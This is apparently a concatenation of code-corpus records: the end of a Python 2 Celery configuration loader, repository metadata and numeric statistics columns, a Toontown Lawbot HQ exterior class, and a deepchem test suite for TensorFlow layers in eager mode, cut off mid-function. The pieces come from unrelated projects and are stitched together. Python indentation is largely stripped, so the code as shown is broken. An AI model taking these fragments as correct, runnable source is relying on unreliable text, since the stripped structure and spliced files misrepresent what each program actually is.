"dbpostgres_user":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'user'),
"dbpostgres_password":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'password')
}
return dicConfig
except Exception as e:
print "~~~~celery config error~~~~"
print e
return False
finally:
if os.path.isfile('/var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))):
with os.popen('/bin/rm /var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))) as osrm:
osrm.read() | 41.220779 | 236 | 0.639887 | 366 | 3,174 | 5.319672 | 0.45082 | 0.035953 | 0.049307 | 0.058552 | 0.326656 | 0.250128 | 0.167437 | 0.151002 | 0.151002 | 0.151002 | 0 | 0.022104 | 0.173283 | 3,174 | 77 | 237 | 41.220779 | 0.719893 | 0.083491 | 0 | 0 | 0 | 0.02 | 0.329173 | 0.163417 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.04 | 0.08 | null | null | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4e7db74b0a777f921aa87993b291e973a2d6ac3 | 1,652 | py | Python | toontown/coghq/LawbotHQExterior.py | journeyfan/toontown-journey | 7a4db507e5c1c38a014fc65588086d9655aaa5b4 | [
"MIT"
] | 1 | 2020-09-27T22:12:47.000Z | 2020-09-27T22:12:47.000Z | toontown/coghq/LawbotHQExterior.py | journeyfan/toontown-journey | 7a4db507e5c1c38a014fc65588086d9655aaa5b4 | [
"MIT"
] | null | null | null | toontown/coghq/LawbotHQExterior.py | journeyfan/toontown-journey | 7a4db507e5c1c38a014fc65588086d9655aaa5b4 | [
"MIT"
] | 2 | 2020-09-26T20:37:18.000Z | 2020-11-15T20:55:33.000Z | from direct.directnotify import DirectNotifyGlobal
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from pandac.PandaModules import *
from toontown.battle import BattlePlace
from toontown.building import Elevator
from toontown.coghq import CogHQExterior
from toontown.dna.DNAParser import loadDNAFileAI
from libpandadna import DNAStorage
from toontown.hood import ZoneUtil
from toontown.toonbase import ToontownGlobals
class LawbotHQExterior(CogHQExterior.CogHQExterior):
notify = DirectNotifyGlobal.directNotify.newCategory('LawbotHQExterior')
def enter(self, requestStatus):
CogHQExterior.CogHQExterior.enter(self, requestStatus)
# Load the CogHQ DNA file:
dnaStore = DNAStorage()
dnaFileName = self.genDNAFileName(self.zoneId)
loadDNAFileAI(dnaStore, dnaFileName)
# Collect all of the vis group zone IDs:
self.zoneVisDict = {}
for i in range(dnaStore.getNumDNAVisGroupsAI()):
groupFullName = dnaStore.getDNAVisGroupName(i)
visGroup = dnaStore.getDNAVisGroupAI(i)
visZoneId = int(base.cr.hoodMgr.extractGroupName(groupFullName))
visZoneId = ZoneUtil.getTrueZoneId(visZoneId, self.zoneId)
visibles = []
for i in range(visGroup.getNumVisibles()):
visibles.append(int(visGroup.getVisible(i)))
visibles.append(ZoneUtil.getBranchZone(visZoneId))
self.zoneVisDict[visZoneId] = visibles
# Next, we want interest in all vis groups due to this being a Cog HQ:
base.cr.sendSetZoneMsg(self.zoneId, list(self.zoneVisDict.values())[0])
| 41.3 | 79 | 0.72276 | 172 | 1,652 | 6.94186 | 0.5 | 0.060302 | 0.021776 | 0.031826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000759 | 0.202179 | 1,652 | 39 | 80 | 42.358974 | 0.905159 | 0.079903 | 0 | 0 | 0 | 0 | 0.010554 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.366667 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c4f84b78cd23bfc6c4e94d2d3b58c3a8e6dd5d94 | 34,172 | py | Python | deepchem/models/tensorgraph/tests/test_layers_eager.py | avimanyu786/deepchem | c5a7c6fff0597b5d896c865efdacec4fa75b00c6 | [
"MIT"
] | null | null | null | deepchem/models/tensorgraph/tests/test_layers_eager.py | avimanyu786/deepchem | c5a7c6fff0597b5d896c865efdacec4fa75b00c6 | [
"MIT"
] | null | null | null | deepchem/models/tensorgraph/tests/test_layers_eager.py | avimanyu786/deepchem | c5a7c6fff0597b5d896c865efdacec4fa75b00c6 | [
"MIT"
] | 1 | 2019-05-19T14:22:32.000Z | 2019-05-19T14:22:32.000Z | import deepchem as dc
import numpy as np
import tensorflow as tf
import deepchem.models.tensorgraph.layers as layers
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
class TestLayersEager(test_util.TensorFlowTestCase):
"""
Test that layers function in eager mode.
"""
def test_conv_1d(self):
"""Test invoking Conv1D in eager mode."""
with context.eager_mode():
width = 5
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, width, in_channels).astype(np.float32)
layer = layers.Conv1D(filters, kernel_size)
result = layer(input)
self.assertEqual(result.shape[0], batch_size)
self.assertEqual(result.shape[2], filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv1D(filters, kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_dense(self):
"""Test invoking Dense in eager mode."""
with context.eager_mode():
in_dim = 2
out_dim = 3
batch_size = 10
input = np.random.rand(batch_size, in_dim).astype(np.float32)
layer = layers.Dense(out_dim)
result = layer(input)
assert result.shape == (batch_size, out_dim)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Dense(out_dim)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_highway(self):
"""Test invoking Highway in eager mode."""
with context.eager_mode():
width = 5
batch_size = 10
input = np.random.rand(batch_size, width).astype(np.float32)
layer = layers.Highway()
result = layer(input)
assert result.shape == (batch_size, width)
assert len(layer.trainable_variables) == 4
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Highway()
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_flatten(self):
"""Test invoking Flatten in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Flatten()(input)
assert result.shape == (5, 40)
def test_reshape(self):
"""Test invoking Reshape in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Reshape((100, 2))(input)
assert result.shape == (100, 2)
def test_cast(self):
"""Test invoking Cast in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 3)
result = layers.Cast(dtype=tf.float32)(input)
assert result.dtype == tf.float32
def test_squeeze(self):
"""Test invoking Squeeze in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 1, 4).astype(np.float32)
result = layers.Squeeze()(input)
assert result.shape == (5, 4)
def test_transpose(self):
"""Test invoking Transpose in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Transpose((1, 2, 0))(input)
assert result.shape == (10, 4, 5)
def test_combine_mean_std(self):
"""Test invoking CombineMeanStd in eager mode."""
with context.eager_mode():
mean = np.random.rand(5, 3).astype(np.float32)
std = np.random.rand(5, 3).astype(np.float32)
layer = layers.CombineMeanStd(training_only=True, noise_epsilon=0.01)
result1 = layer(mean, std, training=False)
assert np.array_equal(result1, mean) # No noise in test mode
result2 = layer(mean, std, training=True)
assert not np.array_equal(result2, mean)
assert np.allclose(result2, mean, atol=0.1)
def test_repeat(self):
"""Test invoking Repeat in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 4).astype(np.float32)
result = layers.Repeat(3)(input)
assert result.shape == (5, 3, 4)
assert np.array_equal(result[:, 0, :], result[:, 1, :])
def test_gather(self):
"""Test invoking Gather in eager mode."""
with context.eager_mode():
input = np.random.rand(5).astype(np.float32)
indices = [[1], [3]]
result = layers.Gather()(input, indices)
assert np.array_equal(result, [input[1], input[3]])
def test_gru(self):
"""Test invoking GRU in eager mode."""
with context.eager_mode():
batch_size = 10
n_hidden = 7
in_channels = 4
n_steps = 6
input = np.random.rand(batch_size, n_steps,
in_channels).astype(np.float32)
layer = layers.GRU(n_hidden, batch_size)
result, state = layer(input)
assert result.shape == (batch_size, n_steps, n_hidden)
assert len(layer.trainable_variables) == 3
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GRU(n_hidden, batch_size)
result2, state2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3, state3 = layer(input)
assert np.allclose(result, result3)
# But if we specify a different starting state, that should produce a
# different result.
result4, state4 = layer(input, initial_state=state3)
assert not np.allclose(result, result4)
def test_lstm(self):
"""Test invoking LSTM in eager mode."""
with context.eager_mode():
batch_size = 10
n_hidden = 7
in_channels = 4
n_steps = 6
input = np.random.rand(batch_size, n_steps,
in_channels).astype(np.float32)
layer = layers.LSTM(n_hidden, batch_size)
result, state = layer(input)
assert result.shape == (batch_size, n_steps, n_hidden)
assert len(layer.trainable_variables) == 3
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.LSTM(n_hidden, batch_size)
result2, state2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3, state3 = layer(input)
assert np.allclose(result, result3)
# But if we specify a different starting state, that should produce a
# different result.
result4, state4 = layer(input, initial_state=state3)
assert not np.allclose(result, result4)
def test_time_series_dense(self):
"""Test invoking TimeSeriesDense in eager mode."""
with context.eager_mode():
in_dim = 2
out_dim = 3
n_steps = 6
batch_size = 10
input = np.random.rand(batch_size, n_steps, in_dim).astype(np.float32)
layer = layers.TimeSeriesDense(out_dim)
result = layer(input)
assert result.shape == (batch_size, n_steps, out_dim)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.TimeSeriesDense(out_dim)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_l1_loss(self):
"""Test invoking L1Loss in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.L1Loss()(input1, input2)
expected = np.mean(np.abs(input1 - input2), axis=1)
assert np.allclose(result, expected)
def test_l2_loss(self):
"""Test invoking L2Loss in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.L2Loss()(input1, input2)
expected = np.mean((input1 - input2)**2, axis=1)
assert np.allclose(result, expected)
def test_softmax(self):
"""Test invoking SoftMax in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.SoftMax()(input)
expected = tf.nn.softmax(input)
assert np.allclose(result, expected)
def test_sigmoid(self):
"""Test invoking Sigmoid in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.Sigmoid()(input)
expected = tf.nn.sigmoid(input)
assert np.allclose(result, expected)
def test_relu(self):
"""Test invoking ReLU in eager mode."""
with context.eager_mode():
input = np.random.normal(size=(5, 10)).astype(np.float32)
result = layers.ReLU()(input)
expected = tf.nn.relu(input)
assert np.allclose(result, expected)
def test_concat(self):
"""Test invoking Concat in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 4).astype(np.float32)
result = layers.Concat()(input1, input2)
assert result.shape == (5, 14)
assert np.array_equal(input1, result[:, :10])
assert np.array_equal(input2, result[:, 10:])
def test_stack(self):
"""Test invoking Stack in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 4).astype(np.float32)
input2 = np.random.rand(5, 4).astype(np.float32)
result = layers.Stack()(input1, input2)
assert result.shape == (5, 2, 4)
assert np.array_equal(input1, result[:, 0, :])
assert np.array_equal(input2, result[:, 1, :])
def test_constant(self):
"""Test invoking Constant in eager mode."""
with context.eager_mode():
value = np.random.rand(5, 4).astype(np.float32)
result = layers.Constant(value)()
assert np.array_equal(result, value)
def test_variable(self):
"""Test invoking Variable in eager mode."""
with context.eager_mode():
value = np.random.rand(5, 4).astype(np.float32)
layer = layers.Variable(value)
result = layer()
assert np.array_equal(result.numpy(), value)
assert len(layer.trainable_variables) == 1
def test_add(self):
"""Test invoking Add in eager mode."""
with context.eager_mode():
result = layers.Add()([1, 2], [3, 4])
assert np.array_equal(result, [4, 6])
def test_multiply(self):
"""Test invoking Multiply in eager mode."""
with context.eager_mode():
result = layers.Multiply()([1, 2], [3, 4])
assert np.array_equal(result, [3, 8])
def test_divide(self):
"""Test invoking Divide in eager mode."""
with context.eager_mode():
result = layers.Divide()([1, 2], [2, 5])
assert np.allclose(result, [0.5, 0.4])
def test_log(self):
"""Test invoking Log in eager mode."""
with context.eager_mode():
result = layers.Log()(2.5)
assert np.allclose(result, np.log(2.5))
def test_exp(self):
"""Test invoking Exp in eager mode."""
with context.eager_mode():
result = layers.Exp()(2.5)
assert np.allclose(result, np.exp(2.5))
def test_interatomic_l2_distances(self):
"""Test invoking InteratomicL2Distances in eager mode."""
with context.eager_mode():
atoms = 5
neighbors = 2
coords = np.random.rand(atoms, 3)
neighbor_list = np.random.randint(0, atoms, size=(atoms, neighbors))
layer = layers.InteratomicL2Distances(atoms, neighbors, 3)
result = layer(coords, neighbor_list)
assert result.shape == (atoms, neighbors)
for atom in range(atoms):
for neighbor in range(neighbors):
delta = coords[atom] - coords[neighbor_list[atom, neighbor]]
dist2 = np.dot(delta, delta)
assert np.allclose(dist2, result[atom, neighbor])
def test_sparse_softmax_cross_entropy(self):
"""Test invoking SparseSoftMaxCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.rand(batch_size).astype(np.int32)
result = layers.SparseSoftMaxCrossEntropy()(labels, logits)
expected = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_softmax_cross_entropy(self):
"""Test invoking SoftMaxCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.rand(batch_size, n_features).astype(np.float32)
result = layers.SoftMaxCrossEntropy()(labels, logits)
expected = tf.nn.softmax_cross_entropy_with_logits_v2(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_sigmoid_cross_entropy(self):
"""Test invoking SigmoidCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.randint(0, 2,
(batch_size, n_features)).astype(np.float32)
result = layers.SigmoidCrossEntropy()(labels, logits)
expected = tf.nn.sigmoid_cross_entropy_with_logits(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_reduce_mean(self):
"""Test invoking ReduceMean in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceMean(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.mean(input, axis=1))
def test_reduce_max(self):
"""Test invoking ReduceMax in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceMax(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.max(input, axis=1))
def test_reduce_sum(self):
"""Test invoking ReduceSum in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceSum(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.sum(input, axis=1))
def test_reduce_square_difference(self):
"""Test invoking ReduceSquareDifference in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceSquareDifference(axis=1)(input1, input2)
assert result.shape == (5,)
assert np.allclose(result, np.mean((input1 - input2)**2, axis=1))
def test_conv_2d(self):
"""Test invoking Conv2D in eager mode."""
with context.eager_mode():
length = 4
width = 5
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, length, width,
in_channels).astype(np.float32)
layer = layers.Conv2D(filters, kernel_size=kernel_size)
result = layer(input)
assert result.shape == (batch_size, length, width, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv2D(filters, kernel_size=kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_3d(self):
"""Test invoking Conv3D in eager mode."""
with context.eager_mode():
length = 4
width = 5
depth = 6
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, length, width, depth,
in_channels).astype(np.float32)
layer = layers.Conv3D(filters, kernel_size=kernel_size)
result = layer(input)
assert result.shape == (batch_size, length, width, depth, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv3D(filters, kernel_size=kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_2d_transpose(self):
"""Test invoking Conv2DTranspose in eager mode."""
with context.eager_mode():
length = 4
width = 5
in_channels = 2
filters = 3
kernel_size = 2
stride = 2
batch_size = 10
input = np.random.rand(batch_size, length, width,
in_channels).astype(np.float32)
layer = layers.Conv2DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result = layer(input)
assert result.shape == (batch_size, length * stride, width * stride,
filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv2DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_3d_transpose(self):
"""Test invoking Conv3DTranspose in eager mode."""
with context.eager_mode():
length = 4
width = 5
depth = 6
in_channels = 2
filters = 3
kernel_size = 2
stride = 2
batch_size = 10
input = np.random.rand(batch_size, length, width, depth,
in_channels).astype(np.float32)
layer = layers.Conv3DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result = layer(input)
assert result.shape == (batch_size, length * stride, width * stride,
depth * stride, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv3DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_max_pool_1d(self):
"""Test invoking MaxPool1D in eager mode."""
with context.eager_mode():
input = np.random.rand(4, 6, 8).astype(np.float32)
result = layers.MaxPool1D(strides=2)(input)
assert result.shape == (4, 3, 8)
def test_max_pool_2d(self):
"""Test invoking MaxPool2D in eager mode."""
with context.eager_mode():
input = np.random.rand(2, 4, 6, 8).astype(np.float32)
result = layers.MaxPool2D()(input)
assert result.shape == (2, 2, 3, 8)
def test_max_pool_3d(self):
"""Test invoking MaxPool3D in eager mode."""
with context.eager_mode():
input = np.random.rand(2, 4, 6, 8, 2).astype(np.float32)
result = layers.MaxPool3D()(input)
assert result.shape == (2, 2, 3, 4, 2)
def test_graph_conv(self):
"""Test invoking GraphConv in eager mode."""
with context.eager_mode():
out_channels = 2
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
layer = layers.GraphConv(out_channels)
result = layer(*args)
assert result.shape == (n_atoms, out_channels)
assert len(layer.trainable_variables) == 2 * layer.num_deg
def test_graph_pool(self):
"""Test invoking GraphPool in eager mode."""
with context.eager_mode():
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
result = layers.GraphPool()(*args)
assert result.shape[0] == n_atoms
# TODO What should shape[1] be? It's not documented.
def test_graph_gather(self):
"""Test invoking GraphGather in eager mode."""
with context.eager_mode():
batch_size = 2
n_features = 75
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
result = layers.GraphGather(batch_size)(*args)
# TODO(rbharath): Why is it 2*n_features instead of n_features?
assert result.shape == (batch_size, 2 * n_features)
def test_lstm_step(self):
"""Test invoking LSTMStep in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_feat = 10
y = np.random.rand(n_test, 2 * n_feat).astype(np.float32)
state_zero = np.random.rand(n_test, n_feat).astype(np.float32)
state_one = np.random.rand(n_test, n_feat).astype(np.float32)
layer = layers.LSTMStep(n_feat, 2 * n_feat)
result = layer(y, state_zero, state_one)
h_out, h_copy_out, c_out = (result[0], result[1][0], result[1][1])
assert h_out.shape == (n_test, n_feat)
assert h_copy_out.shape == (n_test, n_feat)
assert c_out.shape == (n_test, n_feat)
assert len(layer.trainable_variables) == 3
def test_attn_lstm_embedding(self):
"""Test invoking AttnLSTMEmbedding in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_support = 11
n_feat = 10
test = np.random.rand(n_test, n_feat).astype(np.float32)
support = np.random.rand(n_support, n_feat).astype(np.float32)
layer = layers.AttnLSTMEmbedding(n_test, n_support, n_feat, max_depth)
test_out, support_out = layer(test, support)
assert test_out.shape == (n_test, n_feat)
assert support_out.shape == (n_support, n_feat)
assert len(layer.trainable_variables) == 7
def test_iter_ref_lstm_embedding(self):
"""Test invoking AttnLSTMEmbedding in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_support = 11
n_feat = 10
test = np.random.rand(n_test, n_feat).astype(np.float32)
support = np.random.rand(n_support, n_feat).astype(np.float32)
layer = layers.IterRefLSTMEmbedding(n_test, n_support, n_feat, max_depth)
test_out, support_out = layer(test, support)
assert test_out.shape == (n_test, n_feat)
assert support_out.shape == (n_support, n_feat)
assert len(layer.trainable_variables) == 12
def test_batch_norm(self):
"""Test invoking BatchNorm in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
input = np.random.rand(batch_size, n_features).astype(np.float32)
layer = layers.BatchNorm()
result = layer(input)
assert result.shape == (batch_size, n_features)
assert len(layer.trainable_variables) == 2
def test_weighted_error(self):
"""Test invoking WeightedError in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.WeightedError()(input1, input2)
expected = np.sum(input1 * input2)
assert np.allclose(result, expected)
def test_vina_free_energy(self):
"""Test invoking VinaFreeEnergy in eager mode."""
with context.eager_mode():
n_atoms = 5
m_nbrs = 1
ndim = 3
nbr_cutoff = 1
start = 0
stop = 4
X = np.random.rand(n_atoms, ndim).astype(np.float32)
Z = np.random.randint(0, 2, (n_atoms)).astype(np.float32)
layer = layers.VinaFreeEnergy(n_atoms, m_nbrs, ndim, nbr_cutoff, start,
stop)
result = layer(X, Z)
assert len(layer.trainable_variables) == 6
assert result.shape == tuple()
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.VinaFreeEnergy(n_atoms, m_nbrs, ndim, nbr_cutoff, start,
stop)
result2 = layer2(X, Z)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(X, Z)
assert np.allclose(result, result3)
def test_weighted_linear_combo(self):
"""Test invoking WeightedLinearCombo in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
layer = layers.WeightedLinearCombo()
result = layer(input1, input2)
assert len(layer.trainable_variables) == 2
expected = input1 * layer.trainable_variables[0] + input2 * layer.trainable_variables[1]
assert np.allclose(result, expected)
def test_neighbor_list(self):
"""Test invoking NeighborList in eager mode."""
with context.eager_mode():
N_atoms = 5
start = 0
stop = 12
nbr_cutoff = 3
ndim = 3
M_nbrs = 2
coords = start + np.random.rand(N_atoms, ndim) * (stop - start)
coords = tf.cast(tf.stack(coords), tf.float32)
layer = layers.NeighborList(N_atoms, M_nbrs, ndim, nbr_cutoff, start,
stop)
result = layer(coords)
assert result.shape == (N_atoms, M_nbrs)
def test_dropout(self):
"""Test invoking Dropout in eager mode."""
with context.eager_mode():
rate = 0.5
input = np.random.rand(5, 10).astype(np.float32)
layer = layers.Dropout(rate)
result1 = layer(input, training=False)
assert np.allclose(result1, input)
result2 = layer(input, training=True)
assert not np.allclose(result2, input)
nonzero = result2.numpy() != 0
assert np.allclose(result2.numpy()[nonzero], input[nonzero] / rate)
def test_atomic_convolution(self):
"""Test invoking AtomicConvolution in eager mode."""
with context.eager_mode():
batch_size = 4
max_atoms = 5
max_neighbors = 2
dimensions = 3
params = [[5.0, 2.0, 0.5], [10.0, 2.0, 0.5]]
input1 = np.random.rand(batch_size, max_atoms,
dimensions).astype(np.float32)
input2 = np.random.randint(
max_atoms, size=(batch_size, max_atoms, max_neighbors))
input3 = np.random.randint(
1, 10, size=(batch_size, max_atoms, max_neighbors))
layer = layers.AtomicConvolution(radial_params=params)
result = layer(input1, input2, input3)
assert result.shape == (batch_size, max_atoms, len(params))
assert len(layer.trainable_variables) == 3
def test_alpha_share_layer(self):
"""Test invoking AlphaShareLayer in eager mode."""
with context.eager_mode():
batch_size = 10
length = 6
input1 = np.random.rand(batch_size, length).astype(np.float32)
input2 = np.random.rand(batch_size, length).astype(np.float32)
layer = layers.AlphaShareLayer()
result = layer(input1, input2)
assert input1.shape == result[0].shape
assert input2.shape == result[1].shape
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.AlphaShareLayer()
result2 = layer2(input1, input2)
assert not np.allclose(result[0], result2[0])
assert not np.allclose(result[1], result2[1])
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input1, input2)
assert np.allclose(result[0], result3[0])
assert np.allclose(result[1], result3[1])
def test_sluice_loss(self):
"""Test invoking SluiceLoss in eager mode."""
with context.eager_mode():
input1 = np.ones((3, 4)).astype(np.float32)
input2 = np.ones((2, 2)).astype(np.float32)
result = layers.SluiceLoss()(input1, input2)
assert np.allclose(result, 40.0)
def test_beta_share(self):
"""Test invoking BetaShare in eager mode."""
with context.eager_mode():
batch_size = 10
length = 6
input1 = np.random.rand(batch_size, length).astype(np.float32)
input2 = np.random.rand(batch_size, length).astype(np.float32)
layer = layers.BetaShare()
result = layer(input1, input2)
assert input1.shape == result.shape
assert input2.shape == result.shape
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.BetaShare()
result2 = layer2(input1, input2)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input1, input2)
assert np.allclose(result, result3)
def test_ani_feat(self):
"""Test invoking ANIFeat in eager mode."""
with context.eager_mode():
batch_size = 10
max_atoms = 5
input = np.random.rand(batch_size, max_atoms, 4).astype(np.float32)
layer = layers.ANIFeat(max_atoms=max_atoms)
result = layer(input)
# TODO What should the output shape be? It's not documented, and there
# are no other test cases for it.
def test_graph_embed_pool_layer(self):
"""Test invoking GraphEmbedPoolLayer in eager mode."""
with context.eager_mode():
V = np.random.uniform(size=(10, 100, 50)).astype(np.float32)
adjs = np.random.uniform(size=(10, 100, 5, 100)).astype(np.float32)
layer = layers.GraphEmbedPoolLayer(num_vertices=6)
result = layer(V, adjs)
assert result[0].shape == (10, 6, 50)
assert result[1].shape == (10, 6, 5, 6)
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GraphEmbedPoolLayer(num_vertices=6)
result2 = layer2(V, adjs)
assert not np.allclose(result[0], result2[0])
assert not np.allclose(result[1], result2[1])
# But evaluating the first layer again should produce the same result as before.
result3 = layer(V, adjs)
assert np.allclose(result[0], result3[0])
assert np.allclose(result[1], result3[1])
def test_graph_cnn(self):
